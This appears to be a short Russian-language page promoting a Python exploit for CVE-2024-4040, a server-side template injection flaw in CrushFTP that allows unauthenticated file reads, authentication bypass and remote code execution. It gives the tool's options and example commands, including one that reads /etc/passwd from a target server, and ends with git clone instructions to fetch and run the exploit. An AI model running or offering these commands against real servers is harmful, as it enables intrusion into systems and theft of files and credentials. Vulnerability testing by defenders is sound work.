
Уязвимость внедрения шаблонов на стороне сервера (server side template injection) в CrushFTP во всех версиях до 10.7.1 и 11.1.0 на всех платформах позволяет неаутентифицированным удалённым злоумышленникам читать файлы из файловой системы за пределами VFS Sandbox, обходить аутентификацию для получения административного доступа и выполнять удалённый код (remote code execution) на сервере.
Python-эксплойт для CVE-2024-4040
Уязвимость инъекции шаблонов на стороне сервера в CrushFTP во всех версиях до 10.7.1 и 11.1.0 на всех платформах позволяет неавторизованным удаленным злоумышленникам читать файлы из файловой системы за пределами VFS Sandbox, обходить аутентификацию для получения административного доступа и выполнять удаленный код на сервере.
-h --help Show this screen.
-t --target Specify target URL
-f --file Specify file to include
Only test if vulnerable: exploit.py -t http://10.10.1.23:8080
Include /etc/passwd: exploit.py -t http://10.10.1.23:8080 -f /etc/passwd
git clone https://github.com/1ncendium/CVE-2024-4040.git
cd CVE-2024-4040
python3 exploit.py -t http://target:8080